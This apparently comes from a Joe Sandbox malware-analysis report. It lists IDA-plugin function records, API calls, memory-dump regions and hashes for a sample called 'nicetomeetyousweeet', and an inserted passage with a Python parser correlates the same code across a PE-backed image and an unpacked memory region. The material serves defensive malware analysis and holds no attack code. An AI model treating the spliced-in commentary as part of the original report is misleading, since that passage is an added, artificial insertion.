                                                                                • Instruction Fuzzy Hash: A8F0F031A48308FBCB15AF609C0AFBE7B65EF04B12F00016DFC0526252CE75AE10DA9A
                                                                                APIs
                                                                                  • Part of subcall function 00444ACC: EnterCriticalSection.KERNEL32(-0003D155,?,0044225B,00000000,0046DAC0,0000000C,00442216,?,?,?,00448739,?,?,00446F74,00000001,00000364), ref: 00444ADB
                                                                                • EnumSystemLocalesW.KERNEL32(Function_00047068,00000001,0046DC48,0000000C), ref: 004470E6
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                 • Associated: 00000006.00000002.4145931903.0000000000473000.00000040.00000001.01000000.0000000C.sdmp
                                                                                 • Associated: 00000006.00000002.4145931903.0000000000476000.00000040.00000001.01000000.0000000C.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CriticalEnterEnumLocalesSectionSystem
                                                                                • String ID:
                                                                                • API String ID: 1272433827-0
                                                                                • Opcode ID: 294c88a1965c44704c377604ff0a5917817e93c6b6b84f866ad5a3c5a2dedf6a
                                                                                • Instruction ID: 877f7ae5c491a2fbf36f534f7b8138893028b6a81f24f5c3744eb9f6a7677366
                                                                                • Opcode Fuzzy Hash: 294c88a1965c44704c377604ff0a5917817e93c6b6b84f866ad5a3c5a2dedf6a
                                                                                • Instruction Fuzzy Hash: F6F04932A10200EFEB04EF68E806B4D77B0EB44725F10816AF414DB2E2DB7889818B49
                                                                                APIs
                                                                                  • Part of subcall function 007C4D33: RtlEnterCriticalSection.NTDLL(?), ref: 007C4D42
                                                                                • EnumSystemLocalesW.KERNEL32(00447068,00000001,0046DC48,0000000C), ref: 007C734D
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4146476987.0000000000780000.00000040.00001000.00020000.00000000.sdmp, Offset: 00780000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_780000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CriticalEnterEnumLocalesSectionSystem
                                                                                • String ID:
                                                                                • API String ID: 1272433827-0
                                                                                • Opcode ID: 294c88a1965c44704c377604ff0a5917817e93c6b6b84f866ad5a3c5a2dedf6a
                                                                                • Instruction ID: 0978113c59c2a321652b08cbf4a46ffef24eddd3dffd5ee2ab4fefb992633b49
                                                                                • Opcode Fuzzy Hash: 294c88a1965c44704c377604ff0a5917817e93c6b6b84f866ad5a3c5a2dedf6a
                                                                                • Instruction Fuzzy Hash: 8CF0F932A50204EFD714EF68EC4AF9D77B0EB45721F10816AF914DB2A2CB7889819B59
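The two records above carry the same Opcode ID (294c88a1...) but come from different dumps: the PE-backed image at offset 00400000 and the non-PE-backed region at 00780000, and their Instruction IDs and Instruction Fuzzy Hashes differ. Pulling that correlation out of a long report by hand is error-prone, so the parser below is an added example of doing it mechanically; it is not part of the Joe Sandbox report or tooling. The sample text is constructed from three records on this page (the Associated, Yara matches and Similarity lines trimmed), and two conventions it relies on are assumptions read off the records' layout rather than taken from Joe Sandbox documentation: that each record ends at its Instruction Fuzzy Hash line, and that Opcode ID is the stable key for matching the same function across regions.

```python
"""Parse Joe Sandbox IDA-plugin function records and correlate code across dump regions."""
import re
from collections import defaultdict

# Constructed sample: three records copied from this report, with the Associated,
# Yara matches and Similarity lines trimmed to keep the sample short.
SAMPLE = """\
APIs
  • Part of subcall function 00444ACC: EnterCriticalSection.KERNEL32(-0003D155,?), ref: 00444ADB
• EnumSystemLocalesW.KERNEL32(Function_00047068,00000001,0046DC48,0000000C), ref: 004470E6
Memory Dump Source
• Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• API ID: CriticalEnterEnumLocalesSectionSystem
• String ID:
• API String ID: 1272433827-0
• Opcode ID: 294c88a1965c44704c377604ff0a5917817e93c6b6b84f866ad5a3c5a2dedf6a
• Instruction ID: 877f7ae5c491a2fbf36f534f7b8138893028b6a81f24f5c3744eb9f6a7677366
• Instruction Fuzzy Hash: F6F04932A10200EFEB04EF68E806B4D77B0EB44725F10816AF414DB2E2DB7889818B49
APIs
  • Part of subcall function 007C4D33: RtlEnterCriticalSection.NTDLL(?), ref: 007C4D42
• EnumSystemLocalesW.KERNEL32(00447068,00000001,0046DC48,0000000C), ref: 007C734D
Memory Dump Source
• Source File: 00000006.00000002.4146476987.0000000000780000.00000040.00001000.00020000.00000000.sdmp, Offset: 00780000, based on PE: false
• API ID: CriticalEnterEnumLocalesSectionSystem
• String ID:
• API String ID: 1272433827-0
• Opcode ID: 294c88a1965c44704c377604ff0a5917817e93c6b6b84f866ad5a3c5a2dedf6a
• Instruction ID: 0978113c59c2a321652b08cbf4a46ffef24eddd3dffd5ee2ab4fefb992633b49
• Instruction Fuzzy Hash: 8CF0F932A50204EFD714EF68EC4AF9D77B0EB45721F10816AF914DB2A2CB7889819B59
APIs
• GetLocaleInfoA.KERNEL32(00000800,0000005A,00000000,00000003), ref: 0040E68D
Memory Dump Source
• Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• API ID: InfoLocale
• String ID:
• API String ID: 2299586839-0
• Opcode ID: ff71cb212e48055ef4d542031bbd08f4c06058921c3c5a9636dfb358e22ebb72
• Instruction ID: fdf89a5244b67fc368892e36cd71d3b7bc7b33248e42f87f25a9228cb5794c84
• Instruction Fuzzy Hash: E6D05E607002197BEA109291DC0AE9B7A9CE700B66F000165BA01E72C0E9A0AF008AE1
"""

# Direct call made by the function itself: "• Name.MODULE(args), ref: ADDR".
API_RE = re.compile(r"^•\s*(?P<name>\w+)\.(?P<module>\w+)\((?P<args>.*)\), ref: (?P<ref>[0-9A-F]+)$")
# Call reached through a callee: "• Part of subcall function ADDR: Name.MODULE(...)".
SUBCALL_RE = re.compile(r"^•\s*Part of subcall function [0-9A-F]+: (?P<name>\w+)\.(?P<module>\w+)\(")
SOURCE_RE = re.compile(r"Source File: (?P<file>\S+), Offset: (?P<offset>[0-9A-F]+), based on PE: (?P<pe>true|false)")
FIELD_RE = re.compile(r"^•\s*(?P<key>API String ID|API ID|String ID|Opcode ID|Instruction ID"
                      r"|Opcode Fuzzy Hash|Instruction Fuzzy Hash):\s*(?P<val>.*)$")
KEYS = {"API ID": "api_id", "String ID": "string_id", "API String ID": "api_string_id",
        "Opcode ID": "opcode_id", "Instruction ID": "instruction_id",
        "Opcode Fuzzy Hash": "opcode_fuzzy", "Instruction Fuzzy Hash": "instruction_fuzzy"}


def _new_record():
    rec = {"apis": [], "subcalls": [], "source_file": None, "offset": None, "pe_backed": None}
    rec.update({v: "" for v in KEYS.values()})
    return rec


def parse_records(text):
    """One dict per function; a record is assumed to end at its Instruction Fuzzy Hash line."""
    records, cur = [], _new_record()
    for raw in text.splitlines():
        line = raw.strip()
        if (m := SUBCALL_RE.match(line)):
            cur["subcalls"].append(f"{m['module']}!{m['name']}")
        elif (m := API_RE.match(line)):
            cur["apis"].append((f"{m['module']}!{m['name']}", m["ref"]))
        elif (m := SOURCE_RE.search(line)):
            cur["source_file"] = m["file"]
            cur["offset"] = int(m["offset"], 16)
            cur["pe_backed"] = m["pe"] == "true"
        elif (m := FIELD_RE.match(line)):
            cur[KEYS[m["key"]]] = m["val"].strip()
            if m["key"] == "Instruction Fuzzy Hash":  # last field of every record
                records.append(cur)
                cur = _new_record()
    return records


def shared_opcodes(records):
    """Opcode IDs seen in more than one dump region -> sorted [(offset, pe_backed), ...]."""
    seen = defaultdict(set)
    for r in records:
        if r["opcode_id"] and r["offset"] is not None:
            seen[r["opcode_id"]].add((r["offset"], r["pe_backed"]))
    return {k: sorted(v) for k, v in seen.items() if len(v) > 1}


def apis_by_region(records):
    """Region offset -> set of module!API names called directly from code in that region."""
    out = defaultdict(set)
    for r in records:
        for name, _ref in r["apis"]:
            out[r["offset"]].add(name)
    return dict(out)


if __name__ == "__main__":
    recs = parse_records(SAMPLE)
    for opcode, regions in shared_opcodes(recs).items():
        where = ", ".join(f"{off:#x} (PE-backed={pe})" for off, pe in regions)
        print(f"{opcode[:16]}... present in: {where}")
```

Run against the full report text, the same function appearing by Opcode ID both in the mapped image and in a private region that is not PE-backed is the footprint of code copied or unpacked into memory at runtime, and it tells you which region to carve and which Instruction ID (address-specific) to expect in each; `apis_by_region` then shows which imports are already reachable from the unpacked copy.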
                                                                                APIs
                                                                                  • Part of subcall function 00446EBF: GetLastError.KERNEL32(?,0043E260,0043931C,0043E260,?,?,0043B955,FF8BC35D), ref: 00446EC3
                                                                                  • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446EF6
                                                                                  • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,FF8BC35D), ref: 00446F37
                                                                                  • Part of subcall function 00446EBF: _abort.LIBCMT ref: 00446F3D
                                                                                • EnumSystemLocalesW.KERNEL32(00450C4E,00000001), ref: 00450D2E
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                 • Associated: 00000006.00000002.4145931903.0000000000473000.00000040.00000001.01000000.0000000C.sdmp
                                                                                 • Associated: 00000006.00000002.4145931903.0000000000476000.00000040.00000001.01000000.0000000C.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                                                                • String ID:
                                                                                • API String ID: 1084509184-0
                                                                                • Opcode ID: 8c2bccbfd0fc102635c006ca31f830fd57f68f19690e6c985b1f52cdbb333b18
                                                                                • Instruction ID: ec648f77c102ae861fabd43d141f98194b25f4d0b1f390d0839222eb7000fb0b
                                                                                • Opcode Fuzzy Hash: 8c2bccbfd0fc102635c006ca31f830fd57f68f19690e6c985b1f52cdbb333b18
                                                                                • Instruction Fuzzy Hash: CBF05C3D30020557CB159F35D81576B7F94EFC2711B07405AFE098B381C239D846C754
                                                                                APIs
                                                                                • GetLocaleInfoA.KERNEL32(00000800,0000005A,00000000,00000003,?,?,?,004145AD,00473EE8,00474A10,00473EE8,00000000,00473EE8,?,00473EE8,5.3.0 Pro), ref: 0040E68D
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                 • Associated: 00000006.00000002.4145931903.0000000000473000.00000040.00000001.01000000.0000000C.sdmp
                                                                                 • Associated: 00000006.00000002.4145931903.0000000000476000.00000040.00000001.01000000.0000000C.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: InfoLocale
                                                                                • String ID:
                                                                                • API String ID: 2299586839-0
                                                                                • Opcode ID: ff71cb212e48055ef4d542031bbd08f4c06058921c3c5a9636dfb358e22ebb72
                                                                                • Instruction ID: fdf89a5244b67fc368892e36cd71d3b7bc7b33248e42f87f25a9228cb5794c84
                                                                                • Opcode Fuzzy Hash: ff71cb212e48055ef4d542031bbd08f4c06058921c3c5a9636dfb358e22ebb72
                                                                                • Instruction Fuzzy Hash: E6D05E607002197BEA109291DC0AE9B7A9CE700B66F000165BA01E72C0E9A0AF008AE1
                                                                                APIs
                                                                                • GetLocaleInfoA.KERNEL32(00000800,0000005A,00000000,00000003,?,?,?,00794814,00473EE8,00474A10,00473EE8,00000000,00473EE8,?,00473EE8,0046673C), ref: 0078E8F4
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4146476987.0000000000780000.00000040.00001000.00020000.00000000.sdmp, Offset: 00780000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_780000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: InfoLocale
                                                                                • String ID:
                                                                                • API String ID: 2299586839-0
                                                                                • Opcode ID: 5e9075a3806edf431e091a568af27ae769e925cdac090a6302122e919684f26a
                                                                                • Instruction ID: 6706795259860e38c4d693ae929a1c0a34e59eacafff9808fd11a6b6f03d90e6
                                                                                • Opcode Fuzzy Hash: 5e9075a3806edf431e091a568af27ae769e925cdac090a6302122e919684f26a
                                                                                • Instruction Fuzzy Hash: D8D09E75744218BBEA14A6959C0EE9B7A9CE741BA6F100165BA01D72C1E9A0AE048BE1
                                                                                APIs
                                                                                • SetUnhandledExceptionFilter.KERNEL32(Function_00033CE3,004339B1), ref: 00433CDC
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                 • Associated: 00000006.00000002.4145931903.0000000000473000.00000040.00000001.01000000.0000000C.sdmp
                                                                                 • Associated: 00000006.00000002.4145931903.0000000000476000.00000040.00000001.01000000.0000000C.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ExceptionFilterUnhandled
                                                                                • String ID:
                                                                                • API String ID: 3192549508-0
                                                                                • Opcode ID: 3670727f3e8651977646328ecd403d2a1b3c6ba49dd5bfb528ab2007e995f695
                                                                                • Instruction ID: 83953e3dca8a62111c248ad4478ddd9c1373f985a30770e5fc8846644fe13ce9
                                                                                • Opcode Fuzzy Hash: 3670727f3e8651977646328ecd403d2a1b3c6ba49dd5bfb528ab2007e995f695
                                                                                • Instruction Fuzzy Hash:
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                 • Associated: 00000006.00000002.4145931903.0000000000473000.00000040.00000001.01000000.0000000C.sdmp
                                                                                 • Associated: 00000006.00000002.4145931903.0000000000476000.00000040.00000001.01000000.0000000C.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: BG3i@
                                                                                • API String ID: 0-2407888476
                                                                                • Opcode ID: da6bc0b681a35a8a8cd82b5b62752965acc1f5aabf11132faead2372da36057a
                                                                                • Instruction ID: a817909710d0090f483bb13cdd1d1ee80d6dfae79024daed79820ace932836b2
                                                                                • Opcode Fuzzy Hash: da6bc0b681a35a8a8cd82b5b62752965acc1f5aabf11132faead2372da36057a
                                                                                • Instruction Fuzzy Hash: E361777160070966DA385A2858D6BBF6396EB0DB04F10391BE943FF3C1D61DAD43874E
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                 • Associated: 00000006.00000002.4145931903.0000000000473000.00000040.00000001.01000000.0000000C.sdmp
                                                                                 • Associated: 00000006.00000002.4145931903.0000000000476000.00000040.00000001.01000000.0000000C.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: 0
                                                                                • API String ID: 0-4108050209
                                                                                • Opcode ID: 0cdc0b4430c882dd513f9aba2f942575131dd1f5e6007437ccc46010af73f7df
                                                                                • Instruction ID: e47b97b21f836cd03f295ee90de6feb37cae4df0254a032430ab3cefd666e269
                                                                                • Opcode Fuzzy Hash: 0cdc0b4430c882dd513f9aba2f942575131dd1f5e6007437ccc46010af73f7df
                                                                                • Instruction Fuzzy Hash: C851AC3160070457DF388A6985DA7BF6B959B0E700F18352FE48AFB382C60DED02979E
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4146476987.0000000000780000.00000040.00001000.00020000.00000000.sdmp, Offset: 00780000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_780000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: 0
                                                                                • API String ID: 0-4108050209
                                                                                • Opcode ID: e4e8e107ebb569481f6dec165aac6f3bea1aaf1a879556bc36ff33913e703c4a
                                                                                • Instruction ID: 527c486c15381fac658ede9616926f163dcb61da6d5c04cd9894b801804812b4
                                                                                • Opcode Fuzzy Hash: e4e8e107ebb569481f6dec165aac6f3bea1aaf1a879556bc36ff33913e703c4a
                                                                                • Instruction Fuzzy Hash: CC519C7530064497DF374678846A7FF2F989B62300F18C96AE88BCB282E64DDD019371
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4146476987.0000000000780000.00000040.00001000.00020000.00000000.sdmp, Offset: 00780000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_780000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: 0
                                                                                • API String ID: 0-4108050209
                                                                                • Opcode ID: 0cdc0b4430c882dd513f9aba2f942575131dd1f5e6007437ccc46010af73f7df
                                                                                • Instruction ID: fce45feed96008ed763e9370954dd6cb793d6a85f978bead38070114213d8391
                                                                                • Opcode Fuzzy Hash: 0cdc0b4430c882dd513f9aba2f942575131dd1f5e6007437ccc46010af73f7df
                                                                                • Instruction Fuzzy Hash: E7517C63600644DFDB36597C85597FF67DB9B02340F18C99AF842CB282D61DED068361
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                 • Associated: 00000006.00000002.4145931903.0000000000473000.00000040.00000001.01000000.0000000C.sdmp
                                                                                 • Associated: 00000006.00000002.4145931903.0000000000476000.00000040.00000001.01000000.0000000C.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: @
                                                                                • API String ID: 0-2766056989
                                                                                • Opcode ID: 277f5b14ebfb31d9acdfcb19b599133ffeee57438103c682c3dacb2c81b16d7f
                                                                                • Instruction ID: 4dd25ef8aece06dcbd44762d080e1d81d96ea4c89eb3931c7e752ffea448aa68
                                                                                • Opcode Fuzzy Hash: 277f5b14ebfb31d9acdfcb19b599133ffeee57438103c682c3dacb2c81b16d7f
                                                                                • Instruction Fuzzy Hash: 99417576A083158FC314CE29D18021BFBE1FBC8300F568A2EF99693350D679E980CB86
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4146476987.0000000000780000.00000040.00001000.00020000.00000000.sdmp, Offset: 00780000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_780000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: @
                                                                                • API String ID: 0-2766056989
                                                                                • Opcode ID: 277f5b14ebfb31d9acdfcb19b599133ffeee57438103c682c3dacb2c81b16d7f
                                                                                • Instruction ID: 3dec310ed24065cfd2c01f98b71f03cee3b28303e4cb5b96fe88a158e62a3cc0
                                                                                • Opcode Fuzzy Hash: 277f5b14ebfb31d9acdfcb19b599133ffeee57438103c682c3dacb2c81b16d7f
                                                                                • Instruction Fuzzy Hash: A74127759187098FC318CF29C58061BFBE1FBD9354F548A2EF99693350D679A980CF82
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                 • Associated: 00000006.00000002.4145931903.0000000000473000.00000040.00000001.01000000.0000000C.sdmp
                                                                                 • Associated: 00000006.00000002.4145931903.0000000000476000.00000040.00000001.01000000.0000000C.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: HeapProcess
                                                                                • String ID:
                                                                                • API String ID: 54951025-0
                                                                                • Opcode ID: c4eeb5daf7d20212f04cf1a35fe49476965deb7007d4ee0647dc212291e34da0
                                                                                • Instruction ID: 9504a653bcf427532d5064532c05f1d04939bb5561e35e6535c2a7eba45b7a60
                                                                                • Opcode Fuzzy Hash: c4eeb5daf7d20212f04cf1a35fe49476965deb7007d4ee0647dc212291e34da0
                                                                                • Instruction Fuzzy Hash: 84A00270506201CB57404F756F0525937D9654559170580755409C5571D62585905615
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                 • Associated: 00000006.00000002.4145931903.0000000000473000.00000040.00000001.01000000.0000000C.sdmp
                                                                                 • Associated: 00000006.00000002.4145931903.0000000000476000.00000040.00000001.01000000.0000000C.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: b5ca945c73f96586680b794a2cfc8b55e8f7bc2f58380cec5295694457d85c5e
                                                                                • Instruction ID: 1fbb2d6a6e610910e1865e113166bba559d0ad1400e2c5ed2b94208389d41108
                                                                                • Opcode Fuzzy Hash: b5ca945c73f96586680b794a2cfc8b55e8f7bc2f58380cec5295694457d85c5e
                                                                                • Instruction Fuzzy Hash: 4E323621D2AF014DE7639634C862336A649AFB73C5F19D737F81AB5AA6EB2CC4C34105
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                 • Associated: 00000006.00000002.4145931903.0000000000473000.00000040.00000001.01000000.0000000C.sdmp
                                                                                 • Associated: 00000006.00000002.4145931903.0000000000476000.00000040.00000001.01000000.0000000C.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: fa4366285c09898dbebe4e06eb7cc19ae7dd04f2b52c354052fc3ff454ee4381
                                                                                • Instruction ID: 2a34495ee4f42e5442afe8381c33b9994a027dd0bc8bc0cc3fe6fc4803c66e78
                                                                                • Opcode Fuzzy Hash: fa4366285c09898dbebe4e06eb7cc19ae7dd04f2b52c354052fc3ff454ee4381
                                                                                • Instruction Fuzzy Hash: 9732C1796087469BD714DF2AC4807ABB7E1BF84304F444A2EFC958B381D778DD858B8A
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4146476987.0000000000780000.00000040.00001000.00020000.00000000.sdmp, Offset: 00780000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_780000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: a18e7bb7c2c42d1902aff7cdab2f32fbef15b0e2cf6e19f50b6dfc23c9c72e89
                                                                                • Instruction ID: 56dbb753c92c7b11badc350d9bc34f618bdec9312fe4fd45070f655e70039b7f
                                                                                • Opcode Fuzzy Hash: a18e7bb7c2c42d1902aff7cdab2f32fbef15b0e2cf6e19f50b6dfc23c9c72e89
                                                                                • Instruction Fuzzy Hash: 3332E1716087469FDF19DF28D480B6AB7E5BF84304F044A2DF8A58B282E779DD05CB82
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                 • Associated: 00000006.00000002.4145931903.0000000000473000.00000040.00000001.01000000.0000000C.sdmp
                                                                                 • Associated: 00000006.00000002.4145931903.0000000000476000.00000040.00000001.01000000.0000000C.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 5e7cfb39373056f24a3a904b548fd4815eb54790cbaced7075879559032304a0
                                                                                • Instruction ID: 022d1978040d43b7ea9bbfc0a41ffb8b00617051ae00cac38c3f572af68edcce
                                                                                • Opcode Fuzzy Hash: 5e7cfb39373056f24a3a904b548fd4815eb54790cbaced7075879559032304a0
                                                                                • Instruction Fuzzy Hash: 0D028F717046518FD318CF2EE880536B7E1AF8E301B46863EE585C7395EB74E922CB95
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4146476987.0000000000780000.00000040.00001000.00020000.00000000.sdmp, Offset: 00780000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_780000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 51f8d9063bc82676a5307432183369734bf664b3393a643c02daa012ce37ec01
                                                                                • Instruction ID: 66b841e9e299e425b08dc54b03ee50dcf4b77ca5bdb1ab39f2322b2931b75eb3
                                                                                • Opcode Fuzzy Hash: 51f8d9063bc82676a5307432183369734bf664b3393a643c02daa012ce37ec01
                                                                                • Instruction Fuzzy Hash: 71028E717046518FD328CF2DE880536B7E1AF8A3017468A3EE585C7391EB34E922CB95
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                 • Associated: 00000006.00000002.4145931903.0000000000473000.00000040.00000001.01000000.0000000C.sdmp
                                                                                 • Associated: 00000006.00000002.4145931903.0000000000476000.00000040.00000001.01000000.0000000C.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 055be9041e2207fcccce4809f1574f7faa2e999c59950680925987e85d6ae2fe
                                                                                • Instruction ID: dd4ce2a6fae4266494c2f053a510589cf36d02151b1693af83bcfdcd1697f2cb
                                                                                • Opcode Fuzzy Hash: 055be9041e2207fcccce4809f1574f7faa2e999c59950680925987e85d6ae2fe
                                                                                • Instruction Fuzzy Hash: 55F13B716142548FC314DF1DE89187BB3E0EB8A301B460A2EF5C2D7392DB78E91ADB56
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4146476987.0000000000780000.00000040.00001000.00020000.00000000.sdmp, Offset: 00780000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_780000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: ae54c0c007aacb93a7dd55fc151a9a0813301b4ecfdd70e7c81fd1d8629b8821
                                                                                • Instruction ID: f49e8786ae396d1bafbe367ac73a97de9baea4ff3994bd004fed797e1bfdd7ac
                                                                                • Opcode Fuzzy Hash: ae54c0c007aacb93a7dd55fc151a9a0813301b4ecfdd70e7c81fd1d8629b8821
                                                                                • Instruction Fuzzy Hash: 10F13D716142548FC714DF1DE89187B73E0EB8A301B460A2EF5C2D7392DB78EA1ACB56
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                 • Associated: 00000006.00000002.4145931903.0000000000473000.00000040.00000001.01000000.0000000C.sdmp
                                                                                 • Associated: 00000006.00000002.4145931903.0000000000476000.00000040.00000001.01000000.0000000C.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 6263245b1b66a904a13b3213984ac793822dab0d6340cc3b5a577027059b3e4a
                                                                                • Instruction ID: a134442df30985c3d9ded0ed06b90328dea8838589cb671b1bd0994677c35241
                                                                                • Opcode Fuzzy Hash: 6263245b1b66a904a13b3213984ac793822dab0d6340cc3b5a577027059b3e4a
                                                                                • Instruction Fuzzy Hash: 60D1A171A083158BC721DE29C88096FB7E4FFD8354F446A2EF88597361EB38DD058B86
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                 • Associated: 00000006.00000002.4145931903.0000000000473000.00000040.00000001.01000000.0000000C.sdmp
                                                                                 • Associated: 00000006.00000002.4145931903.0000000000476000.00000040.00000001.01000000.0000000C.sdmp
                                                                                Joe Sandbox IDA Plugin
